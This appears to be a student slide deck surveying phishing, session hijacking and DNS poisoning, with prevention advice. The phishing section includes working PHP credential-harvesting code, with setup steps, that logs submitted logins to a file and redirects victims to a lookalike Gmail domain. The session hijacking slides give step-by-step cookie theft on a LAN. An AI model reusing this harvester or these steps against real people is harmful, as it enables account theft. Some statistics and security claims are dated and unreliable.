ATTACKS ON THE CYBER WORLD

BY:NIKHIL TRIPATHI(12MCMB10)

TARUN MEHROTRA(12MCMB11)SUDHIR KUMAR PANDEY(12MCMB14 )

FLOW OF CONTENTS

INTRODUCTION TYPES OF ATTACKS SOCIAL ENGINEERING PHISHING SESSION HIJACKING DNS SPOOFING CONCLUSION

REFERENCES

INTRODUCTION “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick

• 528.1 % is the growth rate of internet users over 2000-2011.

• 85% of business and government agencies detected security breaches.

• FBI estimates that the United States loses up to $10 billion a year to cyber crime.

• In INDIA, 30 million people fell victim to cyber crime last year resulting in loss of Rs34,110 crore, annually.

• Being INTERNET addicted, only one question should arise in our minds—

INTRODUCTION “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick

• 528.1 % is the growth rate of internet users over 2000-2011.

• 85% of business and government agencies detected security breaches.

• FBI estimates that the United States loses up to $10 billion a year to cyber crime.

• In INDIA, 30 million people fell victim to cyber crime last year resulting in loss of Rs34,110 crore, annually.

• Being INTERNET addicted, only one question should arise in our minds—

HOW MUCH WE ARE SECURE?????

VARIOUS ATTACKS•More or less, hundreds of exploits are there which hackers practice on the individual hosts or even on the whole network.•Some of the most popular and dangerous attacks are:

> SESSION HIJACKING (SNIFFING).> PHISHING.> DOS ATTACK (SMURFING).> DNS POISONING(DNS SPOOFING).> SQL INJECTION.> FAKE EMAILING AND EMAIL BOMBING.> TROJAN HORSES, KEYLOGGERS and many more….

SOCIAL ENGINEERING•Art of manipulating people into performing actions or divulging confidential information.•An art of DECEPTION.•Varies from purely technical to purely non-technical.•Depends upon the victim’s cyber knowledge.•Depends upon till what extent attacker is spoofing its identity.•Result of human’s unawareness about the cyber crimes.•Initiation of almost all the cyber attacks practiced nowadays.•One of the most dangerous and most effective technique.•PHISHING is an example of technical social engineering.

PHISHING•Act of attempting to acquire information such as usernames, passwords, by masquerading as a trustworthy entity in an electronic communication.•Started in late 90’s.•Named after the earlier hackers, known as phreakers…•Still, the most effective and most dangerous social-engineering attack.•Overall cost due to online fraud by phishing reached to 3 Billion $ in 2007.•In 2011, it reached the peak of 94 Billion $.•Main reason for growth in phishing scam is the users’ unawareness.

PHISHING(contd.)

HOW IT WORKS?Components of Phishing are:-

•A fake page•A PHP script to redirect user to the original page containing some notifications•The redirected original page along with some notification•The generated text file having username and password

SCREENSHOTS FOR PHISHING DEMO

Working(contd.)•Change the redirected url to the url of PHP file and make sure that both the fake page and PHP script is present within the same directory.•Change the method from POST to GET. •PHP code:-<?phpheader("Location: http://gmaiil.t35.com/ServiceLoginAuth.htm");$handle = fopen("passwords.txt", "a");foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

HOW TO PREVENT PHISHING?

1. The most basic thing is to see the lock beside the url field of the browser.

2. Check the url.

3. Check the certificate allotted to the company by the authorized party. E.g.

Thawte Consulting in case of Google.

4. If possible, enter the IP address for the gmail.com instead of the domain

name. Its time taking but far secure for phishing and DNS poisoning to

happen.

But what if it is combined with other attacks?

SESSION HIJACKING•Used to refer to the theft of a magic cookie responsible to authenticate a user to a remote server.•Some basic methods to implement the attack: Session fixation, Cross-site scripting and the most popular one- Session sidejacking .•Started in 2004 and gained popularity among the hackers like a wildfire.•American National agencies faced million dollars losses due to this attack.•Falls into the category of the deadliest attacks due to occurrences of huge losses.•Can be implemented by first capturing the packets and then analyzing it.•Cain & Abel is popular for capturing and APR and Wireshark/Ettercap is popular for analyzing the packets.

HOW IT WORKS?1. Applicable only if using LANs for accessing the internet.2. Victim access the internet by accessing the default gateway.3. Attacker sitting in the same network captures the packet going from

victim’s machine to the default gateway and vice-versa.4. Now, after capturing, attacker analyze the packets and read the cookies.5. Next, attacker copies those cookies and set it into his/her browser.6. That’s it. Now, he’ll get access to user’s account.

WORKING(contd.)

SCREENSHOTS FOR SESSION

HIGHJACKING

HOW TO PREVENT SESSION HIJACKING?

1. If possible, never use any shared network to access your accounts.2. Otherwise, log out after every few seconds, but it seems impossible.3. The best way is that web servers should use time stamped cookies but it is

still in somewhat, testing phase.4. Otherwise, use HTTPs to encrypt the traffic.

But what if attacker intentionally downgrades your HTTPs connection to HTTP!!!

DNS POISONING• An attack where victim’s machine gets fooled and redirected to some other

server rather than the desired server.

•Also called DNS spoofing.

•Attacker poisons the DNS cache entry so it starts giving false results.

•Cain & Abel can be used for this purpose by using MAN-IN-THE-MIDDLE

attack.

•Being an insecure protocol, any host can resolve the query generated by a

user.

HOW IT WORKS?

HOW TO PREVENT DNS POISONING?

•The only way to prevent DNS poisoning is by making this protocol a secure one. Research is still going on in this field under the brolly of Verisign Inc.•The new protocol will be named as DNSSEC(Domain Name System Security Extension).•http://verisigninc.com is the only domain yet which we found as DNSSEC enabled.•DNSSEC-enabled packets are larger (> 512 bytes) than traditional DNS packets.•DNSSEC will generate more TCP traffic.•DNSSEC requires support for EDNS0.•Thus, a huge change will be required before DNSSEC implementation.

CONCLUSION

•Many attacks are being practiced on the internet all round the globe.•Along with these attacks, some mechanisms are there to be secure from these attacks.•But these mechanisms are not enough to secure us from all the possibilities.•The day is not away from us when the two important components of Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we can say that internet is now secure.•But what to do untill that day? How to be completely secure in this cyber world??•Till then, the only answer which one can think of is---

CONCLUSION•Many attacks are being practiced on the internet all round the globe.•Along with these attacks, some mechanisms are there to be secure from these attacks.•But these mechanisms are not enough to secure us from all the possibilities.•The day is not away from us when the two important components of Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we can say that internet is now secure.•But what to do untill that day? How to be completely secure in this cyber world??•Till then, the only answer which one can think of is---

STAY AWAY FROM INTERNET!!!Its not the proper answer, but at least, its true….

REFERENCES•http://firewall.cx•http://social-engineer.org•http://hackforums.net•http://defcon.org•http://networkworld.com•http://verisigninc.com•http://stackoverflow.com•http://sessionhijack.com

THANK YOU…